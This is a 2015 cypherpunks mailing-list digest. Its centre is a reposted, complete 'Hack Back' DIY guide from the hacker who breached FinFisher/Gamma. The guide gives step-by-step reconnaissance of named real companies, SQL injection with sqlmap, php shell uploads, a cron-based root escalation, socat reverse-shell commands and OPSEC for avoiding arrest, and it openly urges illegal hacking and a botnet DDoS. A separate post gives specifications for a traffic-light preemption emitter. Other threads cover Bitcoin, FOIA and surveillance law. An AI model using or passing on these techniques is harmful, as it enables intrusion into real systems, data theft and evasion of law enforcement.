02:51:27 +0000 (UTC) Subject: Jim Bell vindicated In-Reply-To: <20150708020628.3E0502280B6@palinka.tinho.net> References: <20150708020628.3E0502280B6@palinka.tinho.net> Message-ID: <1094239006.1062331.1436323887402.JavaMail.yahoo@mail.yahoo.com> From: "dan at geer.org" To: cypherpunks at cpunks.org Sent: Tuesday, July 7, 2015 7:06 PM Subject: Re: Jim Bell vindicated >Dodd-Frank, 7 U.S.C. 7a-2(c)(5)(C) >(C) Special rule for review and approval of event contracts and >swaps contracts >(i) Event contracts >In connection with the listing of agreements, contracts, transactions, >or swaps in excluded commodities that are based upon the occurrence, >extent of an occurrence, or contingency (other than a change in the >price, rate, value, or levels of a commodity described in section >1a(2)(i)2 of this title), by a designated contract market or swap >execution facility, the Commission may determine that such agreements, >contracts, or transactions are contrary to the public interest if >the agreements, contracts, or transactions involve -- >  (I) activity that is unlawful under any Federal or State law;  > (II) terrorism; >  (III) assassination; >  (IV) war; >  (V) gaming; or >  (VI) other similar activity determined by the Commission, by rule >  or regulation, to be contrary to the public interest. >(ii) Prohibition >No agreement, contract, or transaction determined by the Commission >to be contrary to the public interest under clause (i) may be listed >or made available for clearing or trading on or through a registered >entity. --------------------------------------------------- Aha!  It's yet another "Anti-Jim-Bell" law!  I have a long history of causing legislatures to change the laws to obstruct what I'm doing.  In 1990, I made an infrared-emitting device, mounted on my car, to cause it to look like an emergency vehicle, and turn red traffic lights to green.   (The device being tricked was made by 3M, trademarked Opticom.  (I called my device the "Optigreen).  One example is:     http://www.gtt.com/opticom-emergency-response/opticom-ir-system/  )   My device emitted at 880 nm wavelength, about 14.035 pulses per minute.  In 1993, I made a large number of them for friends, sale, etc.Hearing about it, the Oregon Legislature passed the following law in 1994:   http://www.oregonlaws.org/ors/815.440 " 815.440¹  Unauthorized possession, use or distribution of traffic control signal operating device - • exemption - • penalty (1)A person commits the offense of unauthorized possession, use or distribution of a traffic control signal operating device if the person owns, uses, sells or otherwise distributes a device that is designed to control a traffic control light as a person using the device approaches the light.   " A few years late, the US Congress enacted a law which criminalized the same thing, federally:  18 U.S.C. 39:   https://www.law.cornell.edu/uscode/text/18/39 "(a) Offenses.—(1) Sale.— Whoever, in or affecting interstate or foreign commerce, knowingly sells a traffic signal preemption transmitter to a nonqualifying user shall be fined under this title, or imprisoned not more than 1 year, or both.(2) Use.— Whoever, in or affecting interstate or foreign commerce, being a nonqualifying user makes unauthorized use of a traffic signal preemption transmitter shall be fined under this title, or imprisoned not more than 6 months, or both.(b) Definitions.— In this section, the following definitions apply:(1) Traffic signal preemption transmitter.— The term “traffic signal preemption transmitter” means any mechanism that can change or alter a traffic signal’s phase time or sequence."             Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 12659 bytes Desc: not available URL: From coderman at gmail.com Wed Jul 8 03:29:59 2015 From: coderman at gmail.com (coderman) Date: Wed, 8 Jul 2015 03:29:59 -0700 Subject: Hacking Team has been hacked (hard) In-Reply-To: References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net> Message-ID: why just the header Rayzer? a guide this good demands completeness --- _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) A DIY Guide for those without the patience to wait for whistleblowers --[ 1 ]-- Introduction I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. And trust me, once you've learned the basics you'll realize this really is easier than filing a FOIA request. --[ 2 ]-- Staying Safe This is illegal, so you'll need to take same basic precautions: 1) Make a hidden encrypted volume with Truecrypt 7.1a [0] 2) Inside the encrypted volume install Whonix [1] 3) (Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it's better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here. [0] https://truecrypt.ch/downloads/ [1] https://www.whonix.org/wiki/Download#Install_Whonix As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix, never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&. NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you'll want a public IP address to receive connect back shells. I recommend using servers you've hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you're running will have a nice fast connection to your target. --[ 3 ]-- Mapping out the target Basically I just repeatedly use fierce [0], whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization. [0] http://ha.ckers.org/fierce/ For an example let's take Blackwater. We start out knowing their homepage is at academi.com. Running fierce.pl -dns academi.com we find the subdomains: 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com Now we do whois lookups and find the homepage of www.academi.com is hosted on Amazon Web Service, while the other IPs are in the range: NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd Doing a whois lookup on academi.com reveals it's also registered to the same address, so we'll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google: "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you've found everything. Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more: 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com If you repeat the whois lookups and such you'll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name "FinFisher GmbH". Googling for: "FinFisher GmbH" inurl:domaintools finds gamma-international.de, which redirects to finsupport.finfisher.com ...so now you've got some idea how I map out a target. This is actually one of the most important parts, as the larger the attack surface that you are able to map out, the easier it will be to find a hole somewhere in it. --[ 4 ]-- Scanning & Exploiting Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated. Now for each service you find running: 1) Is it exposing something it shouldn't? Sometimes companies will have services running that require no authentication and just assume it's safe because the url or IP to access it isn't public. Maybe fierce found a git subdomain and you can go to git.companyname.come/gitweb/ and browse their source code. 2) Is it horribly misconfigured? Maybe they have an ftp server that allows anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's default password. 3) Is it running an old version of software vulnerable to a public exploit? Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually: 1) Browse them. Especially on subdomains that fierce finds which aren't intended for public viewing like test.company.com or dev.company.com you'll often find interesting stuff just by looking at them. 2) Run nikto [0]. This will check for things like webserver/.svn/, webserver/backup/, webserver/phpinfo.php, and a few thousand other common mistakes and misconfigurations. 3) Identify what software is being used on the website. WhatWeb is useful [1] 4) Depending on what software the website is running, use more specific tools like wpscan [2], CMS-Explorer [3], and Joomscan [4]. First try that against all services to see if any have a misconfiguration, publicly known vulnerability, or other easy way in. If not, it's time to move on to finding a new vulnerability: 5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP [5], and some combination of its automated tests along with manually poking around with the help of its intercepting proxy. 6) For the non-custom software they're running, get a copy to look at. If it's free software you can just download it. If it's proprietary you can usually pirate it. If it's proprietary and obscure enough that you can't pirate it you can buy it (lame) or find other sites running the same software using google, find one that's easier to hack, and get a copy from them. [0] http://www.cirt.net/nikto2 [1] http://www.morningstarsecurity.com/research/whatweb [2] http://wpscan.org/ [3] https://code.google.com/p/cms-explorer/ [4] http://sourceforge.net/projects/joomscan/ [5] https://code.google.com/p/zaproxy/ For finsupport.finfisher.com the process was: * Start nikto running in the background. * Visit the website. See nothing but a login page. Quickly check for sqli in the login form. * See if WhatWeb knows anything about what software the site is running. * WhatWeb doesn't recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software. * I view the page source to find a URL I can search on (index.php isn't exactly unique to this software). I pick Scripts/scripts.js.php, and google: allinurl:"Scripts/scripts.js.php" * I find there's a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm. At this point I can see the news stories that journalists will write to drum up views: "In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group..." But it's really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to: * google allinurl:"Scripts/scripts.js.php" and find the other sites * Notice they're all sql injectable in the first url parameter I try. * Realize they're running Apache ModSecurity so I need to use sqlmap [0] with the option --tamper='tamper/modsecurityversioned.py' * Acquire the admin login information, login and upload a php shell [1] (the check for allowable file extensions was done client side in javascript), and download the website's source code. [0] http://sqlmap.org/ [1] https://epinna.github.io/Weevely/ Looking through the source code they might as well have named it Damn Vulnerable Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in javascript, and if you're unauthenticated the admin page just sends you back to the login page with a Location header, but you can have your intercepting proxy filter the Location header out and access it just fine. [0] http://www.dvwa.co.uk/ Heading back over to the finsupport site, the admin /BackOffice/ page returns 403 Forbidden, and I'm having some issues with the LFI, so I switch to using the sqli (it's nice to have a dozen options to choose from). The other sites by the web designer all had an injectable print.php, so some quick requests to: https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 reveal that finsupport also has print.php and it is injectable. And it's database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. But I can use a short script that uses sqlmap --file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site. Looking through the source, I see customers can attach a file to their support tickets, and there's no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I'm in! --[ 5 ]-- (fail at) Escalating ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ Root over 50% of linux servers you encounter in the wild with two easy scripts, Linux_Exploit_Suggester [0], and unix-privesc-check [1]. [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester [1] https://code.google.com/p/unix-privesc-check/ finsupport was running the latest version of Debian with no local root exploits, but unix-privesc-check returned: WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer so I add to /etc/cron.hourly/webalizer: chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell wait an hour, and ....nothing. Turns out that while the cron process is running it doesn't seem to be actually running cron jobs. Looking in the webalizer directory shows it didn't update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that's probably the issue. At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn't get much of anything new, so I move on to the rest of the network. --[ 6 ]-- Pivoting The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful. The only interesting thing I could get on finsupport's local network was another webserver serving up a folder called 'qateam' containing their mobile malware. --[ 7 ]-- Have Fun Once you're in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there's no reason to limit yourself to leaking documents. My original plan was to: 1) Hack Gamma and obtain a copy of the FinSpy server software 2) Find vulnerabilities in FinSpy server. 3) Scan the internet for, and hack, all FinSpy C&C servers. 4) Identify the groups running them. 5) Use the C&C server to upload and run a program on all targets telling them who was spying on them. 6) Use the C&C server to uninstall FinFisher on all targets. 7) Join the former C&C servers into a botnet to DDoS Gamma Group. It was only after failing to fully hack Gamma and ending up with some interesting documents but no copy of the FinSpy server software that I had to make due with the far less lulzy backup plan of leaking their stuff while mocking them on twitter. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2! --[ 8 ]-- Other Methods The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There's no one right way, and any method that works is as good as any other. The other main ways that I'll state without going into detail are: 1) Exploits in web browers, java, flash, or microsoft office, combined with emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browser/java/flash exploit to that. This is the method used by most of the government hacking groups, but you don't need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There's also metasploit browser autopwn, but you'll probably have better luck with no exploits and a fake flash updater prompt. 2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time. The infosec industry invented a term to make this sound like some sort of science: "Social Engineering". This is probably the way to go if you don't know too much about computers, and it really is all it takes to be a successful hacker [0]. [0] https://www.youtube.com/watch?v=DB6ywr9fngU --[ 9 ]-- Resources Links: * https://www.pentesterlab.com/exercises/ * http://overthewire.org/wargames/ * http://www.hackthissite.org/ * http://smashthestack.org/ * http://www.win.tue.nl/~aeb/linux/hh/hh.html * http://www.phrack.com/ * http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot * http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash * https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ * https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (all his other blog posts are great too) * https://www.corelan.be/ (start at Exploit writing tutorial part 1) * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ One trick it leaves out is that on most systems the apache access log is readable only by root, but you can still include from /proc/self/fd/10 or whatever fd apache opened it as. It would also be more useful if it mentioned what versions of php the various tricks were fixed in. * http://www.dest-unreach.org/socat/ Get usable reverse shells with a statically linked copy of socat to drop on your target and: target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM It's also useful for setting up weird pivots and all kinds of other stuff. Books: * The Web Application Hacker's Handbook * Hacking: The Art of Exploitation * The Database Hacker's Handbook * The Art of Software Security Assessment * A Bug Hunter's Diary * Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier * TCP/IP Illustrated Aside from the hacking specific stuff almost anything useful to a system administrator for setting up and administering networks will also be useful for exploring them. This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc. --[ 10 ]-- Outro You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It's not selling hacking tools that makes Gamma evil. It's who their customers are targeting and with what purpose that makes them evil. That's not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it's cheaper to attack than to defend it's harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action. Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals! From grarpamp at gmail.com Wed Jul 8 00:40:47 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 8 Jul 2015 03:40:47 -0400 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users Message-ID: http://arstechnica.com/tech-policy/2015/07/senate-advances-secret-plan-forcing-internet-services-to-report-terror-activity/ https://www.washingtonpost.com/world/national-security/lawmakers-want-internet-sites-to-flag-terrorist-activity-to-law-enforcement/2015/07/04/534a0bca-20e9-11e5-84d5-eb37ee8eaa61_story.html http://www.burr.senate.gov/press/releases/senate-intelligence-committee-advances-fy2016-authorization-bill The Senate Intelligence Committee secretly voted on June 24 in favor of legislation requiring e-mail providers and social media sites to report suspected terrorist activities. The legislation, approved 15-0 in a closed-door hearing, remains "classified." The relevant text is contained in the 2016 intelligence authorization... From coderman at gmail.com Wed Jul 8 04:32:09 2015 From: coderman at gmail.com (coderman) Date: Wed, 8 Jul 2015 04:32:09 -0700 Subject: FOIPA adventures In-Reply-To: References: Message-ID: for all of you driving vehicles with hundreds of global variables around weird machines radio linked to strange networks, the following new FOIAs: https://www.muckrock.com/foi/united-states-of-america-10/badaccel-19510/ @FBI Use of Sudden unintended acceleration (SUA) or Unintended acceleration in the commission of a crime, including premeditated offenses of any kind. Please include suspicion of Sudden unintended acceleration (SUA) or suspicion of Unintended acceleration within the scope of this request, even if alternate cause determined. This search is to include any and all records, including cross-references and indirect mentions, including records outside the investigation main file. This is to include a search of each of the following record stores and interfaces: the Central Records System (CRS), the Automated Case Support system ("ACS") Investigative Case Management system ("ICM"), the Automated Case Support system ("ACS") Electronic Case File ("ECF"), and the Automated Case Support system ("ACS") Universal Index ("UNI"). Please include processing notes, even if request is denied in part. Please identify individuals responsible for any aspect of FOIA processing in the processing notes, along with explanation of their involvement if not typically assigned FOIA responsibilities for the record systems above. @DoT https://www.muckrock.com/foi/united-states-of-america-10/badaccel-19509/ best regards, From juan.g71 at gmail.com Wed Jul 8 00:52:11 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 8 Jul 2015 04:52:11 -0300 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: References: Message-ID: <559cd699.c511370a.4f2c6.2444@mx.google.com> On Wed, 8 Jul 2015 03:40:47 -0400 grarpamp wrote: > > The Senate Intelligence Committee secretly voted on June 24 in favor > of legislation requiring e-mail providers and social media sites to > report suspected terrorist activities. The legislation, approved 15-0 > in a closed-door hearing, remains "classified." The relevant text is > contained in the 2016 intelligence authorization... Damn! You grarpamp and your pals who 'own'the government, should have told your servants not to do that. What happened?? From l at odewijk.nl Tue Jul 7 15:50:04 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Wed, 8 Jul 2015 07:50:04 +0900 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> Message-ID: 2015-07-08 7:27 GMT+09:00 Sean Lynch : > What? Bitcoin exists so that rich people in western countries >> especially the US can become even richer. So far it worked >> pretty well. >> > > Really? What rich person has gotten richer through Bitcoin so far? > Remittances seem like the biggest use of Bitcoin at the moment. Sure, > there's plenty of speculation, but your claim that Bitcoin's purpose is to > make the rich richer is also speculation. And FUD. > Yours would the Uncertainty and Doubt, I see. Bitcoin is cold hard money - therefore benefiting those that can exploit it best. The most capital you have, the better you can exploit it. Therefore, the wealthy stand more to benefit from Bitcoin than anyone else. Any other effect would indicate softness of Bitcoin or some human issue. It does prevent (certain forms of) suppression; it's very hard to censor financial transactions on the Bitcoin network. It also provides a great deal of financial and administrative utility to all in similar quantity, it levels the playing field of the poor/rich somewhat. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1640 bytes Desc: not available URL: From l at odewijk.nl Tue Jul 7 16:21:48 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Wed, 8 Jul 2015 08:21:48 +0900 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> Message-ID: 2015-07-08 7:53 GMT+09:00 Sean Lynch : > > Perhaps my response was a bit hyperbolic, but that is a very different > claim than "Bitcoin exists so that rich people in western countries > especially the US can become even richer." > Put on your Juanglasses and the difference is hardly perceptible ;) Still not sure what to make of the guy's constant rant-mode. It just seems to cause defensive and less constructive argumentation. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 815 bytes Desc: not available URL: From jya at pipeline.com Wed Jul 8 05:33:53 2015 From: jya at pipeline.com (John Young) Date: Wed, 08 Jul 2015 08:33:53 -0400 Subject: [cryptome] Re: FOIPA adventures In-Reply-To: References: Message-ID: Quite nice compilation of sources configured to evade FOIA. Ever finer feigning requires ever finer seining. Paraphrasing Charles Murray, "US's ever more manipulable legal system and ever increasing government regulations are essentally lawless. When governments transgress citizens' rights, revolution is not treason but the people's duty." At 07:32 AM 7/8/2015, coderman wrote: >for all of you driving vehicles with hundreds of global variables >around weird machines radio linked to strange networks, > >the following new FOIAs: > >https://www.muckrock.com/foi/united-states-of-america-10/badaccel-19510/ >@FBI >Use of Sudden unintended acceleration (SUA) or Unintended acceleration >in the commission of a crime, including premeditated offenses of any >kind. Please include suspicion of Sudden unintended acceleration (SUA) >or suspicion of Unintended acceleration within the scope of this >request, even if alternate cause determined. This search is to include >any and all records, including cross-references and indirect mentions, >including records outside the investigation main file. This is to >include a search of each of the following record stores and >interfaces: the Central Records System (CRS), the Automated Case >Support system ("ACS") Investigative Case Management system ("ICM"), >the Automated Case Support system ("ACS") Electronic Case File >("ECF"), and the Automated Case Support system ("ACS") Universal Index >("UNI"). Please include processing notes, even if request is denied in >part. Please identify individuals responsible for any aspect of FOIA >processing in the processing notes, along with explanation of their >involvement if not typically assigned FOIA responsibilities for the >record systems above. > > >@DoT >https://www.muckrock.com/foi/united-states-of-america-10/badaccel-19509/ > > >best regards, From blukami at gmail.com Wed Jul 8 05:41:37 2015 From: blukami at gmail.com (Edd thompson) Date: Wed, 8 Jul 2015 08:41:37 -0400 Subject: Bitcoin exchanges. Message-ID: Is there and way a person can get their paycheck direct deposit to a Bitcoin? So instead of a deposit to a checking account it goes to an exchange that converts it for you? And then is there a good way to access currency in rural areas? I have seen a few videos and read overviews but they never get to how to make it practical for people not in big cities, hell it just doesn't seem practical at all unless you live near an exchange or are willing to do credit card transactions that cost on top of the exchange and make the currency traceable. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 575 bytes Desc: not available URL: From Rayzer at riseup.net Wed Jul 8 08:58:19 2015 From: Rayzer at riseup.net (Razer) Date: Wed, 08 Jul 2015 08:58:19 -0700 Subject: [from offlist] "Google is to surveillance capitalism what GM was to managerial capitalism" In-Reply-To: References: <559C3763.1000205@riseup.net> Message-ID: <559D489B.4040207@riseup.net> The pdf doesn't let you mail it? Try the attached. It mailed for me. If it works for you note that all I did was save a renamed copy from inside Linux Viewer RR On 07/08/2015 03:03 AM, Cari Machet wrote: > > Thanks for posting it i cannot fucking cut and paste it to my friend > in prison ... the downloaded pdf doesnt let you and the online one > fucks up the formatting ... i will be able to at least send him this > > Pdf hatred > > On Jul 7, 2015 11:36 PM, "Razer" > wrote: > > > > Big Other: Surveillance Capitalism and the Prospects of an > Information > > Civilization > > > > Shoshana Zuboff, Berkman Center for Internet & Society; Harvard > > Business School > > > > April 4, 2015 > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1609 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: Shoshana Zuboff - Big Other - Surveillance Capitalism and the Prospects of an Information.pdf Type: application/pdf Size: 317325 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From uwecerron at gmail.com Wed Jul 8 06:20:45 2015 From: uwecerron at gmail.com (uwecerron at gmail.com) Date: Wed, 8 Jul 2015 09:20:45 -0400 Subject: Bitcoin exchanges. In-Reply-To: References: Message-ID: I thought bitpay had a payroll option. Sent from my iPhone > On Jul 8, 2015, at 8:41 AM, Edd thompson wrote: > > Is there and way a person can get their paycheck direct deposit to a Bitcoin? So instead of a deposit to a checking account it goes to an exchange that converts it for you? And then is there a good way to access currency in rural areas? > I have seen a few videos and read overviews but they never get to how to make it practical for people not in big cities, hell it just doesn't seem practical at all unless you live near an exchange or are willing to do credit card transactions that cost on top of the exchange and make the currency traceable. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 951 bytes Desc: not available URL: From l at odewijk.nl Tue Jul 7 18:05:23 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Wed, 8 Jul 2015 10:05:23 +0900 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com> Message-ID: 2015-07-08 9:08 GMT+09:00 Sean Lynch : > A "litmus test" issue might be whether you think the NSA's expressed > surprise over Snowden's leaks was genuine. I tend to think it was, and that > his documents are genuine. I see no reason for the NSA to be substantially > more competent than, say, the OPM. There's absolutely no reason to think the NSA doesn't have a layered/multi-cell operation wherein a mere contractor is not given access to nation-essential secrets. If there's a foreign spy you want him to penetrate what seems like a complete organisation. Why not give them what they want? There's lots of "more secure than FBI/CIA, less secure than 'we broke enigma' " work to be done, just put it in the public-facing independently operating organisation. Would you publish "we broke enigma" in a memo to the intranet? NSA didn't. NSA wouldn't get worse at what they do. The real headbreaker is when this is a problem. It's basically not a problem until you're a threat to the absolute fundamentals of what the NSA is designed to protect. And what's that? Is it personal freedom, the advancement of the human race, and the minimization of suffering? Is it the maximization of some abstract profit? The concentration of power? Do the latter two pretty much amount to the first? Intelligence laundering is a serious issue, of course, but running a clean organization would make the laundering exceedingly hard. They're each large organizations with no bottom line that attract people of > flexible moral character who are attracted to power and/or job security. I'm in Korea, I talked to a bunch of US soldiers stationed here. They're exceedingly good-hearted, well-intentioned, high-spirited guys. Many love their work, the tension, the seriousness and hone their performance for sport and need. The balance between trigger-happy and accident-adverse is delicate and they seem extensively coached to preserve the balance properly. I've talked to some that like their state, but hate the FED. I've talked to some that think the US is bad but it's enemies are worse. I've talked to some that have doubts about parts of the US, about corruption, but believe in democracy such that they believe the US is a fundamental force of good. The lesson is: very moral people still do very immoral things for many, sometimes excellent, reasons. > I don't think those traits tend to lead to effective organizations, as > much as a number of Hollywood movies would like us to believe. I think there's not much difference between organisations. Make sure people's motivations are sincere and that they put in the effort. There's apparently a serious issue with "human resource rot" where worse people get brought into orgs or people get unfocused or demotivated. Without a bottom line there's less penalty for it. Doesn't mean it will happen. Snowden sure shows a certain amount of rot in NSA_Public. The recent Trident leak shows that the UK's nuclear deterrent program is rotten to a ridiculous point, but seems to indicate the US does much better. Who knows! ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3994 bytes Desc: not available URL: From drwho at virtadpt.net Wed Jul 8 10:34:59 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 08 Jul 2015 10:34:59 -0700 Subject: Inquiry re. how to handle Glomar reply to FOIA request In-Reply-To: References: <559C8626.9070504@riseup.net> Message-ID: <559D5F43.6010305@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/08/2015 12:50 AM, coderman wrote: > this is waaaay too wordy. one thing i've learned, is to keep any > request as short, and laser guided as possible. some agencies > will find whatever excuse they can to deny a request, and if one > element of The FBI and the Air Force have been known to tack on additional keywords with Boolean ANDs to FOIA requests specifically to make them so narrow that they won't match. Typically, overbroad requests will get kicked back as being such and you'll have to refile with more specific search terms. > your query falls into the deny bin they'll send the whole thing > back or deny outright as "unreasonable". Yup. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "In a world with lots of shadows, the rats will do very well." --David Brin -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVnV8+AAoJED1np1pUQ8RksJgP/jLFA5CWrWlL0CKB11lVlOOr wj6/wAm57Ojt6npL+YKRbVNMJ48kRofnc0Xk78QC4VV8CbqkhgJ/yr3I5/FABw0s imGXLbOYeW/gDE9uhCq3OYE5Htl8audrTYjFs1RWSKwhHN2EUJWejiKssmkrEZyT Mz+NOSL8aCwql5HjB1a1/yX7sV5AXjgLdD8Qtp/NUMRbkVNj1okPEqKqhdojl2xM rDatb8TdIKuhZYq6JYlXQsN/YHKHEE72iFxhvtmkTqH8ACNv/kKYFGxUYRGPNV+y qrEB51IEheW856GpfPGZIDoCx1qfs7GpogiTDmktcCv3Uqs3HxNXVVziEQpqO7x7 IDZXRoEYRejRx1GKanay0wcFuiNLXoMhD7vxeyczzOhRIZv8vuQsA6Q1kCkd0o/y qk+1dyuEaMvoLGgXkkO58PcIH6Y8hb+ci9WJRdHoMKas7rfh4ntNMgvjyzVhlhyf 24CTcniG+YmvHKBUGy0/z1bsRhSHwXE7kQSM4TPFmw3b1gvTiFCT96slj9wEGyRh Wla0OFzAbHi4JsHRdJwQ0ZSfhko/9p4SIcKDlH0HPblVOSJo9ck4pWckpgOTyqon Z8IcUnz30ZDTVwLzaVPN37VEEF8KA5W6eRAvI1ocbIH43ofDKIiYKn1t+RAgKqu1 jml/wyYIx6FyaTvvBj0W 